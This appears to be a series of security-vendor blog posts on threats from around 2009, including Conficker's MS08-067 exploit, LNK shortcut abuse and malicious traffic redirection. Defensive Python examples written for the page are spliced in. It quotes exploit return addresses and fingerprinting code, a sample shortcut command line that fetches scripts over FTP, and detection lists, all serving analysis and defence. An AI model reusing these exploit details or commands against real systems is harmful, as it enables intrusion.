At the turn of 2009, malicious PDF documents were discovered to be exploiting a 0-day vulnerability affecting Adobe Reader 8.x and 9.x. While parsing a specially crafted embedded object, a bug in the reader allowed the attacker to overwrite memory at an arbitrary location. The attacks found in the field use the infamous “HeapSpray” method via JavaScript to gain control of code execution (see below):

malicious code execution

In the above image, the eax register is specially crafted to point to the malicious shellcode that installs a trojan. When successful, the attack installs a backdoor that provides remote control and monitoring of infected systems. Further characteristics of this backdoor and detection details are posted at http://vil.nai.com/vil/content/v_153842.htm

While the distribution of this exploit thus far appears to be targeted, new variants are expected as more information is made public. As with the Conficker experience, the lack of good patch management is a very worrying trend that deserves more attention from IT security practitioners. Adobe is expected to release a patch very soon:

http://www.adobe.com/support/security/advisories/apsa09-01.html

MS09-002 Exploit in the wild uses MSWord Lure

An exploit targeting a recently patched Internet Explorer 7 vulnerability was discovered in the wild. Malware crooks were quick to develop a working exploit for the vulnerability, which was part of the February Microsoft patch release. Microsoft rated this vulnerability critical, with consistent exploit code considered likely. The modus operandi bears close resemblance to the zero-day attack using Word documents we blogged about in December 2008.

The attack, delivered in the form of a maliciously crafted document, is sent out to unsuspecting users. This Word document contains an embedded ActiveX control which, upon opening, connects to a website hosting the MS09-002 exploit.

Malware authors are always working to create new and improved ways to evade detection and control compromised machines. This time, malware authors introduced obfuscation (base64 encoding) possibly to evade easy analysis and detection.

The ActiveX control facilitates connection to the malicious website to launch and execute the MS09-002 exploit.

For those who have not patched their machines, we suggest you install the MS09-002 patch immediately. It will just be a matter of time before different variants of this exploit start circulating in the wild and become incorporated into various Do-It-Yourself web attack toolkits.

The malicious word document is detected with the current DATS as Exploit-MSWord.k and the Internet Explorer 7 exploit is detected as Exploit-XMLhttp.d / Exploit-CVE2009-0075.

Default Security Policies For HTC Touch Pro Not So Secure

Recently I bought a new cell phone: the HTC Touch Pro. Great mobile phone. Opera Mobile Web surfing is handled great. The Sprint EV-DO Rev A network is fast and it’s the most stable smart phone I’ve had so far. As a security researcher naturally I had to dig deeper into how secure this mobile phone actually is. I quickly found out things that make me wonder if the mobile handset industry has learned anything from the desktop industry as far as protecting consumers.

The first thing I did was look at the default security settings of the mobile phone. Microsoft mobile keeps the policies in the registry under HKLM\Security\Policies\Policies. These policies are also documented at http://msdn.microsoft.com/en-us/library/ms890461.aspx along with the recommended settings to use as a security baseline at http://msdn.microsoft.com/en-us/library/ms889564.aspx. The first thing I noticed is that some policy settings on my phone are, by default, different from the recommended settings. Below is the analysis on two of these changed policy settings:

SL Message Policy (registry value 0000100c)
Recommended default: 2048 (SECROLE_PPG_TRUSTED)
Value on HTC Touch Pro: 2112 (SECROLE_PPG_TRUSTED | SECROLE_USER_UNAUTH)

SI Message Policy (registry value 0000100d)
Recommended default: 3072 (SECROLE_PPG_AUTH | SECROLE_PPG_TRUSTED)
Value on HTC Touch Pro: 3136 (SECROLE_PPG_AUTH | SECROLE_PPG_TRUSTED | SECROLE_USER_UNAUTH)

These policy settings define WAP Push SI (Service Indication) and SL (Service Load). WAP was designed to be used by operators, administrators, and others to push software updates or even ringtones directly to the phone. For some unknown reason the HTC Touch Pro has broken from the recommended security policy and added a flag (SECROLE_USER_UNAUTH) that allows unauthenticated WAP Pushes from anyone. What does this mean? It means that an attacker can send a WAP push telling you to install spyware, like FlexiSpy, which gives them full control of your mobile handset. Once installed, the attacker can obtain your private data, your passwords, call logs, and even eavesdrop using the microphone. Sound familiar? And don’t think that it has to be a WAP push with a WAP gateway etc. That’s not the only impact these settings have. A specially crafted SMS can have the same effect as sending the WAP push through a gateway. A binary SMS message can contain a WAP SL Push (using SL as it can be used to force the downloading of spyware without user intervention or prompts) that instructs the mobile handset to go to a specific URL, get the spyware, and run the spyware after receiving it. In this case, all the attacker would need is the mobile handset phone number to send the binary SMS message to.

Further research showed that binary SMS does not seem to work on Sprint’s CDMA network, although it is reported to work on GSM networks such as AT&T’s. This makes me wonder what the default security policy for WAP Pushes is on AT&T’s version of the HTC Touch Pro, the HTC FUZE. In any case, unless you know you absolutely need this flag, set these security policies to the Microsoft-recommended default values of 2048 and 3072 respectively. I use PHM Registry Editor, although any registry editor for Windows Mobile can be used.
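To make the audit above repeatable, here is an added example (our own code, not from the post or from Microsoft) that decodes the two policy DWORDs into role flags and compares them with the recommended baseline. The flag values are taken from the page’s own arithmetic: SECROLE_PPG_TRUSTED = 2048 and SECROLE_PPG_AUTH | SECROLE_PPG_TRUSTED = 3072 are stated, and SECROLE_USER_UNAUTH = 64 follows from 2112 − 2048 and 3136 − 3072; any other bit is reported as unknown rather than guessed. The registry export is a constructed dictionary with the values the post reports.

```python
# Windows Mobile security-role flags used by the WAP Push policies discussed above.
# The two PPG roles and their sums (2048, 3072) are stated on the page; the value of
# SECROLE_USER_UNAUTH (64 = 2112 - 2048 = 3136 - 3072) is derived from the page's figures.
# Any bit outside this table is reported as unknown rather than guessed.
ROLE_BITS = {
    0x800: "SECROLE_PPG_TRUSTED",
    0x400: "SECROLE_PPG_AUTH",
    0x040: "SECROLE_USER_UNAUTH",
}
UNAUTHENTICATED_ROLES = {0x040}

# Recommended baseline per policy, keyed by the registry value name under
# HKLM\Security\Policies\Policies (0x100c = SL Message Policy, 0x100d = SI Message Policy).
BASELINE = {
    "0000100c": ("SL Message Policy", 0x800),
    "0000100d": ("SI Message Policy", 0x400 | 0x800),
}


def decode_roles(value):
    """Split a policy DWORD into role names, lowest bit first; unknown bits are kept as hex."""
    names = [name for bit, name in sorted(ROLE_BITS.items()) if value & bit]
    leftover = value & ~sum(ROLE_BITS)
    if leftover:
        names.append(f"UNKNOWN_0x{leftover:x}")
    return names


def audit_policy(value_name, value):
    """Compare one policy value with the baseline and return a finding dict."""
    label, expected = BASELINE[value_name]
    extra = value & ~expected
    missing = expected & ~value
    return {
        "policy": label,
        "actual": decode_roles(value),
        "expected": decode_roles(expected),
        "extra_roles": decode_roles(extra),
        "missing_roles": decode_roles(missing),
        "allows_unauthenticated": any(value & bit for bit in UNAUTHENTICATED_ROLES),
        "compliant": value == expected,
    }


def audit_policies(registry_values):
    """Audit every known policy in a {value_name: dword} mapping; returns only the deviations."""
    return [audit_policy(k, v) for k, v in registry_values.items()
            if k in BASELINE and v != BASELINE[k][1]]


# Constructed registry exports: the values the post reports for the HTC Touch Pro,
# and the Microsoft-recommended baseline for comparison.
HTC_TOUCH_PRO = {"0000100c": 2112, "0000100d": 3136}
MICROSOFT_BASELINE = {"0000100c": 2048, "0000100d": 3072}

if __name__ == "__main__":
    for finding in audit_policies(HTC_TOUCH_PRO):
        print(finding)
```

Running it against the HTC values reports both policies as non-compliant with SECROLE_USER_UNAUTH as the only extra role, which is exactly the flag that lets an unauthenticated push reach the handset; the Microsoft baseline produces no findings.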

Abusing Shortcut files

Shortcuts, or LNK files, are small binary files that hold the path to an application, sometimes with optional parameters. They are used to launch applications and are placed where users can reach them easily, such as the desktop and application launchers. LNK files are also placed in the Startup folder to run automatically at system boot. This indirect way of running applications is attractive to malware authors, because shortcuts have not been called to most users’ attention as a security risk the way executable files have. At Avert Labs, we have recently seen malware abusing shortcut files to launch malicious files or scripts in several different ways. Here we introduce some of the methods we have seen:

  1. Creating shortcut files that link to malware files
     This is an easy way to launch malware through a user’s actions or upon system reboot. These LNK files are created on the desktop, on network shares, and even in startup folders. One of the many variants of the Spy-Agent.bw trojan is known to take advantage of shortcuts to run.

  2. Parasitic infection of shortcuts
     We have seen the W32/Mokaksu virus modify all LNK files on the desktop, prepending the path of the malware file to the original path.

     The example above is the shortcut to Adobe Acrobat Reader infected with malware. The path to the malicious “Config.Msi.exe” (in the red box) is added before the original path “AcroRd32.exe” (in the yellow box). In the shortcut, the original path is treated as a parameter to the malware file. Upon clicking the shortcut, the W32/Mokaksu malware runs and also executes the original file, all while staying in the background. Users see only the application associated with the shortcut, which makes the infection much harder to notice.

  3. Scripts in the shortcuts
     Shortcuts can also contain command lines for “cmd.exe” instead of linking to executable trojan files. The Downloader-BMF trojan is such a case.

     When users click on these LNK files, the command line silently creates and drops FTP scripts, which then download VBS scripts from the FTP servers. The downloaded VBS scripts are in turn responsible for downloading trojan files.

In the first two cases, shortcuts are merely a way of launching malware, whereas in the last case the LNK files are stand-alone malicious files: no other malicious executable is needed, only the legitimate “cmd.exe”. LNK files of this type can be attached to e-mails or hosted on websites, so we need to be more careful with them. Users can easily inspect a shortcut through its file properties or by viewing the file in a binary editor.

If you find suspicious strings, please do not run the files but rather send the files to Avert for further research.
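Inspecting a shortcut in a binary editor is tedious at scale, so here is an added example (our own code, not from the post or from any McAfee tool) that parses the Shell Link (MS-SHLLINK) header and StringData fields and flags the three abuse patterns above: an executable path demoted to a parameter, an interpreter target carrying an inline command line, and FTP or VBS references in the arguments. It handles only the header, the optional ID list and LinkInfo sizes, and the string fields, which is enough to recover target and arguments. The three sample .lnk files are constructed in the block with the builder function; the file names mirror the post’s description but are illustrative, and the interpreter list beyond cmd.exe is an assumed extension.

```python
import struct

# Shell Link (.lnk) header constants from the MS-SHLLINK format. Field names follow the
# specification; the sample files below are constructed here, not taken from real malware.
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}

HAS_LINK_TARGET_ID_LIST = 1 << 0
HAS_LINK_INFO = 1 << 1
HAS_NAME = 1 << 2
HAS_RELATIVE_PATH = 1 << 3
HAS_WORKING_DIR = 1 << 4
HAS_ARGUMENTS = 1 << 5
HAS_ICON_LOCATION = 1 << 6
IS_UNICODE = 1 << 7

STRING_FIELDS = [  # StringData entries appear in this order, each only if its flag is set
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
]

# Interpreters whose presence as a shortcut target turns the LNK into a script carrier.
# cmd.exe is the case the post describes; the others are an assumed extension of the same kind.
INTERPRETERS = {"cmd.exe", "wscript.exe", "cscript.exe", "powershell.exe"}


def parse_lnk(data):
    """Return the StringData fields (target path, arguments, ...) of a Shell Link file."""
    if len(data) < LNK_HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE:
        raise ValueError("not a Shell Link: bad HeaderSize")
    if data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link: bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:  # IDListSize (u16) followed by the item ID list
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:  # LinkInfoSize (u32) includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & IS_UNICODE)
    fields = {}
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]  # CountCharacters, no terminator
        pos += 2
        nbytes = count * 2 if unicode else count
        raw = data[pos:pos + nbytes]
        pos += nbytes
        fields[name] = raw.decode("utf-16-le") if unicode else raw.decode("cp1252")
    return fields


def triage_shortcut(fields):
    """Flag the abuse patterns described in the post; returns a list of reasons (empty = nothing odd)."""
    target = fields.get("relative_path", "")
    args = fields.get("arguments", "")
    reasons = []
    base = target.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if base in INTERPRETERS and args:
        reasons.append(f"target is an interpreter ({base}) with an inline command line")
    if ".exe" in args.lower():
        reasons.append("arguments contain an executable path (original target demoted to a parameter)")
    if "ftp" in args.lower() or ".vbs" in args.lower():
        reasons.append("arguments reference ftp or a VBS script")
    return reasons


def build_lnk(relative_path, arguments=None):
    """Assemble a minimal but valid .lnk (header + StringData + terminal block) for testing."""
    flags = HAS_RELATIVE_PATH | IS_UNICODE | (HAS_ARGUMENTS if arguments is not None else 0)
    header = struct.pack("<I16sIIQQQIIIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)  # ARCHIVE attribute, SW_SHOWNORMAL

    def enc(s):
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    body = enc(relative_path) + (enc(arguments) if arguments is not None else b"")
    return header + body + struct.pack("<I", 0)  # TerminalBlock closes the ExtraData section


# Constructed samples modelled on the three cases above (paths and names are illustrative).
SAMPLES = {
    "benign": build_lnk(r"..\..\Program Files\Adobe\Reader\AcroRd32.exe"),
    "parasitic": build_lnk(r"C:\Windows\Config.Msi.exe", r"C:\Program Files\Adobe\Reader\AcroRd32.exe"),
    "script": build_lnk(r"C:\Windows\System32\cmd.exe", r"/c ftp -s:%TEMP%\dl.txt"),
}

if __name__ == "__main__":
    for label, blob in SAMPLES.items():
        fields = parse_lnk(blob)
        print(label, fields, triage_shortcut(fields) or ["clean"])
```

Real shortcuts usually carry a LinkTargetIDList and LinkInfo block before the strings; the parser skips both by their declared sizes, so it works on files pulled from a desktop or startup folder as well as on the constructed samples.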

The McAfee 2009 Threat Predictions

Today, we at McAfee Avert Labs released our 2009 Threat Predictions. Amongst the findings are:

Threats Hide in the Cloud
Miscreants have also transitioned to the Internet “cloud” as their main delivery vehicle and take advantage of the attractions of Web 2.0. McAfee expects this trend to continue throughout 2009, eventually displacing more traditional vectors of malware distribution.

Personalized Threats Speak Your Language
Threats will continue to take evasive action against security measures. One example is the existence of single-use binary files, which are an attacker’s equivalent of a single-use credit card number used by consumers when shopping online. These binaries help to create a vast sea of threats, which will make it harder for victims to describe their assailants, and make it harder for defenders to catch them. Additionally, McAfee expects to see the continued expansion of malware in languages other than English. Cybercriminals have come to realize that by diversifying into a global market they can access even larger pools of valuable identity and confidential information.

Malware Targets Consumer Devices
McAfee expects increased attacks involving USB sticks and flash-memory devices used in cameras, picture frames, and other consumer electronics. This trend will continue due to the almost unregulated use of flash storage across enterprise environments as well as their popularity among consumers.

The Rogue Web and Malvertising
Last year McAfee also saw the malware underground use mainstream practices in an effort to “sell” software that was either misleading or outright fraudulent. McAfee expects this trend to continue as cybercriminals still see a lucrative market in this area.

McColo: The Effects of a Takedown
Spam traffic took a tremendous dive in volume when ISPs pulled the plug on spam host McColo Corp., the source of up to 60 percent of worldwide spam. In 2009, we will see a continued shift in organizations, from passive support of law enforcement to an active role of working collaboratively with ISPs and global Internet entities such as ICANN. Together, these organizations will shine the public light on these malicious actors and shut down their access to network and systems infrastructure.

Download the full report from our whitepaper page here.

Shrinking Patch Timelines – The Need For HIPS

Over the years, the window between the discovery of an exploit and its incorporation into a worm has shrunk from months, to weeks, to zero-day. This leaves administrators with very little time to schedule and deploy patches to all servers and workstations on their network. Virus authors, on the other hand, have been quick to include exploit code in their creations whenever a critical vulnerability is reported. The chart below shows the time between a vulnerability being reported and virus authors incorporating it into a worm.

Patch versus Worm Timelines

The year 2007 was the only exception in recent times for a worm not exploiting any critical Microsoft vulnerability.

It’s easy for an outsider to criticize or pass judgment on a network that was hit with a zero-day worm. Spare a thought for the IT administrator; most do not have the flexibility to deploy patches immediately to the network for policy reasons. For example, the organization could be using legacy software, which could break if a new service pack was applied. And keeping these legacy applications running takes precedence over applying the latest Windows hot fixes. Most system administrators, who work in hospitals and other mission critical jobs, don’t have the luxury of doing a Windows update!

To add to these woes, every once in a while a hot fix from Microsoft breaks something in the operating system or adversely affects other applications. Once a patch is rolled out via WSUS (Windows Server Update Services) it cannot be rolled back centrally, so a faulty patch from the vendor can prove costly for the organization. For these reasons administrators need more time to deploy these hot fixes in a test environment and QA them properly before rolling them out to the enterprise.

So what can an administrator do in these circumstances? Relying solely on mainstream-antivirus desktop protection or firewall-style perimeter protection is insufficient to deal with today’s modern threats. The need of the hour is defense-in-depth. Administrators, who don’t have the luxury of applying patch updates, should seriously consider having a HIPS (host intrusion prevention system) installed on the end point to prevent exploit-based worm infections. Host intrusion prevention systems not only protect systems against zero-day vulnerabilities but also give administrators more time to test and deploy patches. The recent W32/Conficker.worm outbreaks could have been nipped in the bud if more organizations had chosen to protect their systems with HIPS.

Conficker Worm using Metasploit payload to spread

Recently we got some new samples of the W32/Conficker.Worm to analyze. While investigating we found that this worm has an exploit for the recent MS08-067 vulnerability and uses the exploitation method derived from the metasploit ms08_067_netapi module to spread itself. Below is the traffic packet capture snapshot sent by the worm:

As we can see from the image above, there are some random alphanumeric characters in the packet which seem to have been generated by Rex::Text.rand_text_alpha in ms08_067_netapi.rb. And if we do a byte-order conversion of the data in the red box above, we get three addresses: 0x00020408, 0x6f8917c2, 0x6f88f807, which are the internal targets of the ms08_067_netapi.rb exploit, as listed below (from metasploit):

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 English (NX)',
  {
    'Ret'       => 0x6f88f807,
    'DisableNX' => 0x6f8917c2,
    'Scratch'   => 0x00020408
  }
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
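Matching captured payload bytes against a framework’s published target table is how the attribution above is made repeatable. The following is an added example (our own code, not from the post or from Metasploit): it slides a four-byte window over a payload, reads each position as a little-endian DWORD, and reports offsets equal to one of the three addresses quoted from ms08_067_netapi.rb. The payload is constructed in the block (alphabetic filler plus the three addresses) and is neither a real capture nor a working exploit; a target is only identified when all of its addresses are present, because the Scratch value alone is small enough to appear in ordinary binary traffic.

```python
import struct

# Target table for "Windows XP SP3 English (NX)" as quoted on the page from ms08_067_netapi.rb.
KNOWN_TARGETS = {
    "Windows XP SP3 English (NX)": {
        "Ret": 0x6f88f807,        # JMP ESI in ACGENRAL.DLL
        "DisableNX": 0x6f8917c2,  # NX bypass in ACGENRAL.DLL
        "Scratch": 0x00020408,
    },
}


def scan_for_addresses(payload, targets=KNOWN_TARGETS):
    """Read every byte offset as a little-endian DWORD and report those equal to a known address."""
    wanted = {}
    for target_name, addrs in targets.items():
        for role, addr in addrs.items():
            wanted.setdefault(addr, []).append((target_name, role))
    hits = []
    for offset in range(len(payload) - 3):
        (value,) = struct.unpack_from("<I", payload, offset)
        for target_name, role in wanted.get(value, ()):
            hits.append((offset, target_name, role, value))
    return hits


def identify_target(payload, targets=KNOWN_TARGETS):
    """Name the target whose complete address set appears in the payload, else None.

    Requiring every address avoids alerting on Scratch (0x00020408) alone, a small value that
    can occur in ordinary binary traffic; the two ACGENRAL.DLL addresses are far more specific.
    """
    hits = scan_for_addresses(payload, targets)
    for target_name, addrs in targets.items():
        roles_seen = {role for _, name, role, _ in hits if name == target_name}
        if roles_seen == set(addrs):
            return target_name
    return None


# Constructed payload: alphabetic filler standing in for rand_text_alpha output, with the three
# addresses embedded little-endian. It is not a real capture and not a working exploit.
SAMPLE_PAYLOAD = (
    b"KqzWnaTeLs"
    + struct.pack("<I", 0x00020408)
    + b"dPs"
    + struct.pack("<I", 0x6f8917c2)
    + struct.pack("<I", 0x6f88f807)
    + b"yHBv"
)

if __name__ == "__main__":
    for offset, target_name, role, value in scan_for_addresses(SAMPLE_PAYLOAD):
        print(f"offset {offset:3d}: {role:<9} 0x{value:08x} ({target_name})")
    print("identified:", identify_target(SAMPLE_PAYLOAD))
```

Adding further entries to KNOWN_TARGETS (other language or service-pack targets from the module) extends the same check without changing the scanner; the byte-order conversion the post mentions is exactly the `<I` unpack.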

The latest metasploit exploit, besides covering the Windows XP and 2003 operating systems, also includes targets for several languages such as English, Arabic, Czech, Danish, German, Greek, Spanish, Finnish, French, Hebrew, Japanese, Chinese, and others. The ms08_067_netapi module also provides the smb_fingerprint() function to detect the Windows version, Service Pack, and language of the target OS. This makes programming the worm much easier and can cause a much bigger impact. By using the exploit from the metasploit module as the code base, a virus or worm programmer only needs to implement the functions for automatic downloading and spreading. We believe this can be accomplished by an average programmer who understands the basics of exploitation and has decent programming skills. After further analysis of the traffic capture, we found that only the functions for detecting the OS version and Service Pack were embedded in this worm. Hence, without the remote language-detection ‘feature’, this worm only targets English OS versions at the time of writing.

Here is a packet capture snippet used in this malware to detect the OS version and Service Pack information:

By sending an SMB session setup request, it can detect the OS information of the target machine. If the OS is Windows Server 2003, the Service Pack information is also returned.

Since there are a huge number of Windows XP systems, the worm writer obviously did not want to miss out on this pool; this is why the worm determines the Service Pack level by accessing the \SRVSVC named pipe, which is similar to the method used in the metasploit smb_fingerprint() function:

if (os == 'Windows XP' and sp.length == 0)
  # SRVSVC was blocked in SP2
  begin
    smb_create("\\SRVSVC")
    sp = 'Service Pack 0 / 1'
  rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
    if (e.error_code == 0xc0000022)
      sp = 'Service Pack 2+'
    end
  end
end

So in this instance it’s obvious that malware/worm writers are abusing open source tools to their advantage to make their work easier.

For those who haven’t patched their machines, we suggest you install the MS08-067 patch ASAP! If you are a McAfee Host IPS or Network IPS user, we’ve verified that you are protected against this worm by signature IDs 3961 and 0x40709d00 respectively. For VirusScan users, DAT version 5444 has coverage to detect this worm.

Google Code Project Abused by Spammers

Google’s code-hosting project is the latest free service to be abused by web spammers. We’ve seen one or two previously, but over the holidays the situation appears to have got much worse. They are creating lots of new projects with the following type of website on:

google code pic

Clicking the image will take you to today’s fake codec download site. Repeated clicks will take you to an adult site [both NSFW, you have been warned!].

The difference between this and the MSN Spaces abuse that is now about a year old is that Google appears to automatically index code projects, so any Google-Jedi can generate a good list (Google Search–again, don’t click the links) to start with.

Or the fact that the image is linked from http://bestsextube dot net/video.gif all the time might also be useful to know. ;) The icing on the cake, though, is the link to somewhere/in.cgi … I’ll come back to this later.

The porntube site is also host to a number of other related sites such as fake anti-anything software:

google code net pic

The codec download site, which is in Latvia, also hosts a number of related sites:

google code net pic

The Google Code project owner has a few other projects of a similar nature, too.

A year ago I blogged about MSN Spaces beta with a very similar issue… I even spoke to some very nice folks there about it, and a year later it’s still being abused by spammers [ spamhaus award. ] I trust Google would like to appear less evil and will take more decisive action. I’d suggest mashing code and safe browsing together, but it appears not to find anything wrong with the clickable links, though it did catch on after some redirection took place.

…perhaps I should start consulting on this sort of thing ;)

Anybody suffering déjà vu? “/in.cgi” should ring an alarm bell or two. If not, check out my colleague Micha’s blog on traffic management. He explains what happens to those clicks! This is campaign “6.”

Happy new year to all!

Inside The Malicious Traffic Business

The Web’s classical social-engineering trick of the “missing video codec” tries to lure people into clicking on links or downloading and installing an executable that pretends to be the application needed to watch the movie. The animated picture below is such an example: at first glance, it looks like a typical embedded video that fails to load. The “picture” states that you have to click on it in order to see the movie. And here the lure begins - in this blog entry, we’ll follow it down and outline what kind of traffic management backbones are deployed for malware campaigns nowadays.

In our example the animated image is hosted on a popular blog platform and the link points to a suspicious Flash sample. As a quick analysis reveals, the Flash is compressed and additionally contains some obfuscated JavaScript code to hide its real intention. The script code redirects to another location.

The new location points to a so-called “Traffic Management System”. In this case, if you load the URL several times, the destination rotates and after too many retries you will be always redirected to the homepage of Google. The system remembers your IP address on the server-side for a certain time period. After that time, or when you just use another IP address, you will again see the redirections when visiting the URL.

The redirections are based on a typical HTTP “302 Found” response with a new location from the server where the traffic management system is installed. Another example, which also used Geo-Location, was outlined in this Avert Labs Blog post where a downloader trojan contacted such a system and based on the country, different malware binaries were downloaded.

Such traffic management systems nowadays are configured via web-based administration interfaces. Typically the links for the “incoming traffic” look like http://www.example.com/in.cgi?three or http://www.example.com/in.cgi?default where “three” or “default” stands for different campaign IDs inside the system. A typical rule could look like shown in the following picture.

The administrator is able to define rules for “incoming traffic” that result in different “outgoing traffic” based on various restrictions. For example, geo-location could be used to redirect visitors from one country to one location while visitors from another country are redirected elsewhere - just think of localized campaigns targeted at the language spoken in those countries. So users from the United States will not be redirected to a French phishing website and vice versa.

These traffic management systems can also use more complex rules based on network ranges and the referrer. Let’s say that only visitors with a referrer from Google will be redirected to a malicious website, as long as the visitor’s IP address does not come from well-known network ranges belonging to security companies.

Why do that? This way, only users searching for the website will get to the malicious redirect, while the websites’ owner or administrator, who usually does not search for it but directly enters the URL into the browser, will see the normal website with no oddities. This helps the attacker to keep the infection under the radar for a longer time.
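The practical counter to such cloaking is differential probing: fetch the same in.cgi URL under different conditions (with and without a search-engine referrer, from a residential address and from a vendor range, repeatedly from one address) and compare where each request is sent. The block below is an added example (our own code, not from the post) that parses captured raw HTTP responses, extracts the 302 Location, and groups probes by destination; more than one destination for the same URL is the cloaking signal. The responses are constructed inline with placeholder hostnames; no real traffic management system was contacted.

```python
from collections import defaultdict

REDIRECT_CODES = {301, 302, 303, 307, 308}


def parse_response_head(raw):
    """Parse status code and headers from a raw HTTP response; the body, if any, is ignored."""
    head = raw.split("\r\n\r\n", 1)[0]
    status_line, *header_lines = head.split("\r\n")
    status = int(status_line.split(" ", 2)[1])
    headers = {}
    for line in header_lines:
        if ":" in line:
            key, value = line.split(":", 1)
            headers[key.strip().lower()] = value.strip()
    return status, headers


def redirect_target(raw):
    """Return the Location of a redirect response, or None when the response is not a redirect."""
    status, headers = parse_response_head(raw)
    return headers.get("location") if status in REDIRECT_CODES else None


def group_by_destination(probes):
    """probes: iterable of (probe_label, raw_response). Maps each destination to the probes that reached it."""
    groups = defaultdict(list)
    for label, raw in probes:
        groups[redirect_target(raw) or "<no redirect>"].append(label)
    return dict(groups)


def looks_cloaked(probes):
    """True when requests for one URL, differing only in referrer, source network or repeat count,
    were sent to different destinations."""
    return len(group_by_destination(probes)) > 1


# Constructed responses for the same http://www.example.com/in.cgi?three URL fetched under
# different conditions. The landing hostname is a placeholder (.invalid TLD), not a real site.
PROBES = [
    ("search-engine referrer, residential IP, 1st visit",
     "HTTP/1.1 302 Found\r\nLocation: http://landing-page.invalid/x\r\nContent-Length: 0\r\n\r\n"),
    ("no referrer, residential IP",
     "HTTP/1.1 302 Found\r\nLocation: http://www.example.com/\r\nContent-Length: 0\r\n\r\n"),
    ("search-engine referrer, security-vendor IP range",
     "HTTP/1.1 302 Found\r\nLocation: http://www.example.com/\r\nContent-Length: 0\r\n\r\n"),
    ("search-engine referrer, residential IP, 5th visit",
     "HTTP/1.1 302 Found\r\nLocation: http://www.google.com/\r\nContent-Length: 0\r\n\r\n"),
]

# A site that answers every probe the same way shows no cloaking.
CONSISTENT = [
    ("direct", "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html></html>"),
    ("via search engine", "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html></html>"),
]

if __name__ == "__main__":
    for destination, labels in group_by_destination(PROBES).items():
        print(destination, "<-", labels)
    print("cloaked:", looks_cloaked(PROBES), "| consistent site cloaked:", looks_cloaked(CONSISTENT))
```

The third and fourth probes reproduce the two behaviours the post describes: a vendor IP range is sent to the harmless page, and repeated visits from one address end up at Google’s homepage once the server has remembered the IP.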

Other traffic management systems, like the one shown in the above picture, also feature different logins to the web interface - for the administrator, the “sellers” and the “buyers”. This particular system has different views for sellers of traffic - that is, infected websites containing an IFRAME that points to the traffic management system - and for buyers of traffic - that is, the people who run exploit servers and try to install malware on unpatched computers, and who are therefore looking for potential victims. Such traffic management systems sit between the infected websites and the exploit servers. As you can see in the above picture, payment options can also be configured, so the more traffic a seller redirects to a buyer, the more money is paid. With such systems in between, campaigns can easily be exchanged or the “traffic” can be sold to new buyers trying to install their malware.

So the classical starter, the “missing video codec” trick, can end up in quite a complex system managing modern malware campaigns. Visiting or following a malicious resource nowadays means that you are redirected by a complex server-side management system.

25C3: Nothing to Hide

The last major event of the year has just ended: The 25th Chaos Communication Congress’ Closing Ceremony just took place. Now in its 25th year, making it one of the oldest annual IT security conferences on the planet, more than 4,000 visitors crowded the BCC in Berlin, making it difficult to get into the talks, much like at Defcon some years ago.

For the talks: as always there was a healthy mix of technical, cultural, and society-related topics (the full schedule can be found here). Surprising was the low number of local speakers talking about security problems or releasing tools; this may be related to a lot of confusion about the impact of recent German legislation banning “hackertools.” Recordings of all talks will eventually be available here.

Some of the highlights of the conference (yes, with four days and three parallel tracks I’m certainly missing some that should be mentioned) were Security Failures in Smart Card Payment Systems, by Steven Murdoch; Fabian Yamaguchi’s talk about TCP DoS Vulnerabilities; SWF and the Malware Tragedy, by BeF and fukami; FX of Phenoelit talking about the State of Attack/Defense of Routers (start watching your infrastructure, folks!) and finally the conference highlight, a talk about creating a rogue CA certificate, by David Molnar, Marc Stevens, Benne de Weger, Arjen Lenstra, Dag Arne Osvik, Jacob Appelbaum, and Alex Sotirov. By taking advantage of known (and widely ignored) weaknesses of MD5-signed certificates and a bad implementation at a CA, they were able to create a rogue CA certificate trusted by all browsers–OUCH!

A very interesting note concerning the Rogue CA talk: they didn’t give out any details on what they were planning to talk about until just before the talk itself. As they were afraid that someone or some company might try to gag them and prevent the talk from happening, they discussed the content with affected parties only under NDA. Meaning: they made the other party sign the NDA, not the other, usual, way around!

This year there were a number of talks about mobile phone (in)security and about the GSM network in general, an interesting trend to follow in the next months/years. And at the very end a vulnerability affecting many Symbian-based phones, trivial to exploit manually, had been released: SMSCurse (I’ve got no working link at the time of this writing). It basically crashes the SMS messaging on a phone and may require factory reset to restore it, depending on the phone.

I took this as an opportunity to create a current backup of my phone–how old is your latest backup? :)

Have a Happy and Safe New Year!

IE 7 Exploit Reloaded: The new face of Drive-by Attacks using Doc files

Recently we blogged about an unpatched Internet Explorer 7 exploit in the wild. With the vulnerability information made public, McAfee Avert Labs has noticed a spike in the number of active websites hosting this exploit. Lately we are seeing customized versions of the IE 7 exploit with varying degrees of obfuscation.

Malware authors have been coming up with innovative mechanisms to leverage this exploit to social engineer the not so tech-savvy internet users. One of the most prominent and unique techniques adopted by the malware authors involves a Microsoft word document being sent out to an unsuspecting user.

Upon opening the Word document, the embedded ActiveX control with the following classid is instantiated and executed.

  • {AE24FDAE-03C6-11D1-8B76-0080C744F389}

This control stores configuration data for the policy setting Microsoft Scriptlet Component.

ActiveX

